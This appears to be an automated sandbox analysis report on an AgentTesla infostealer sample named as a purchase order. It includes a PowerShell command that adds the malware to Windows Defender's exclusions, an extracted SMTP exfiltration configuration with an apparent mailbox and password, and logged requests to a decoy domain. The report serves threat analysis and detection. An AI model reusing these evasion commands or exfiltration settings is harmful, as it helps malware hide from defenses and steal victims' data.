Analysis Report 08042021New-PurchaseOrder.bat

Overview

General Information

Sample Name: 08042021New-PurchaseOrder.bat (renamed file extension from bat to exe)
Analysis ID: 383917
MD5: 27233176a2a979195b01a53ec16c7631
SHA1: 0ef424d2000f18e6b83473535bf85d22ed9ab79b
SHA256: 397a62fc978f7a97a87caaf9c35e98e4a053de4e786beee73a6c1ac0e99c9fc9
Tags: AgentTesla, bat, Yahoo

Detection

AgentTesla
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains strange resources
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Startup

  • System is w10x64
  • 08042021New-PurchaseOrder.exe (PID: 4952 cmdline: 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 4436 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5744 cmdline: 'C:\Users\user\AppData\Local\Temp\ad2a32e8-d371-420d-aff0-c38bfb943d1f\AdvancedRun.exe' /SpecialRun 4101d8 4436 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
    • powershell.exe (PID: 5828 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 3636 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\08042021New-PurchaseOrder.exe' -Force MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 1928 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 6284 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • WerFault.exe (PID: 6460 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4952 -s 2784 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • SWqTT.exe (PID: 3064 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 5204 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
      • AdvancedRun.exe (PID: 5304 cmdline: 'C:\Users\user\AppData\Local\Temp\6c8082d4-9c17-4dbf-af3a-b69aa21e82f5\AdvancedRun.exe' /SpecialRun 4101d8 5204 MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • SWqTT.exe (PID: 5192 cmdline: 'C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe' MD5: 27233176A2A979195B01A53EC16C7631)
    • AdvancedRun.exe (PID: 7116 cmdline: 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\fd1184c9-c9ac-4916-9473-72e4acc27c78\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run MD5: 17FC12902F4769AF3A9271EB4E2DACCE)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000020.00000002.486317190.0000000006341000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000001.00000002.291099995.0000000003543000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000020.00000002.487748726.000000000645C000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: 08042021New-PurchaseOrder.exe PID: 4952 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
Process Memory Space: SWqTT.exe PID: 3064 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
32.2.SWqTT.exe.64915d0.5.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
1.2.08042021New-PurchaseOrder.exe.3543aa8.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
32.2.SWqTT.exe.64915d0.5.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
1.2.08042021New-PurchaseOrder.exe.3543aa8.3.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
1.2.08042021New-PurchaseOrder.exe.35790c8.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 32.2.SWqTT.exe.64915d0.5.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "fixer2015@yandex.ruChibuonyenze88880000smtp.yandex.ru"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\SWqTT\SWqTT.exe ReversingLabs: Detection: 14%
Multi AV Scanner detection for submitted file
Source: 08042021New-PurchaseOrder.exe ReversingLabs: Detection: 14%
Source: unknown HTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
Source: 08042021New-PurchaseOrder.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: System.Core.ni.pdbRSDSD source: WER3A64.tmp.dmp.20.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.292139953.0000000003659000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.233606021.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000000.377976496.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000025.00000000.411827266.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000026.00000000.421152625.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.34.dr
Source: Binary string: System.Xml.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb\F source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Core.pdbZ source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Configuration.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: mscorlib.pdb853321935-2125563209-4053062332-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32# source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
Source: Binary string: jVisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: System.Configuration.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb-Q source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: System.Xml.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Core.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: jLC:\Windows\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: O.pdb4( source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: mscorlib.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb5t source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302660548.0000000006764000.00000004.00000001.sdmp
Source: Binary string: System.Drawing.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Drawing.pdb9 source: WER3A64.tmp.dmp.20.dr
Source: Binary string: mscorlib.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: @sxC:\Users\user\Desktop\08042021New-PurchaseOrder.PDBO source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: ww08042021New-PurchaseOrder.PDB source: 08042021New-PurchaseOrder.exe, 00000001.00000002.285903784.00000000004F8000.00000004.00000010.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbu source: 08042021New-PurchaseOrder.exe, 00000001.00000002.302515242.0000000006740000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Core.pdb source: WER3A64.tmp.dmp.20.dr
Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb0309D}\InProcServer32 source: 08042021New-PurchaseOrder.exe, 00000001.00000002.303666174.00000000067D0000.00000004.00000001.sdmp
Source: Binary string: System.Xml.pdbD source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Windows.Forms.pdb04lk source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.Xml.ni.pdbRSDS source: WER3A64.tmp.dmp.20.dr
Source: Binary string: System.ni.pdb source: WER3A64.tmp.dmp.20.dr
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Source: global traffic HTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1 UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41 Host: myliverpoolnews.cf
Source: Joe Sandbox View IP Address: 172.67.150.212 172.67.150.212
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                      Source: unknownHTTPS traffic detected: 172.67.150.212:443 -> 192.168.2.3:49704 version: TLS 1.0
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E349A863A698863617D7B55886FAE832.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cfConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-ADD8B69CFB72A4D5DBAFC5A0A255FA77.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: global trafficHTTP traffic detected: GET /liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html HTTP/1.1UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41Host: myliverpoolnews.cf
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS 
Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <footer><ul id="section-links"><li><a href="https://www.liverpool.com/liverpool-fc-news/" data-link-tracking="Footer|Liverpool FC News">Liverpool FC News</a></li><li><a href="https://www.liverpool.com/schedule/" data-link-tracking="Footer|Schedule">Schedule</a></li><li><a href="https://www.liverpool.com/liverpool-fc-news/features/" data-link-tracking="Footer|Features">Features</a></li><li><a href="https://www.liverpool.com/all-about/premier-league" data-link-tracking="Footer|Premier League">Premier League</a></li></ul><div class="social-links"><h4>Follow us<ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|bottom"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS 
Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.twitter.com (Twitter)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text 
publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text 
publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook)
                      Source: 08042021New-PurchaseOrder.exe, 00000001.00000003.212236533.000000000368E000.00000004.00000001.sdmpString found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.twitter.com (Twitter)
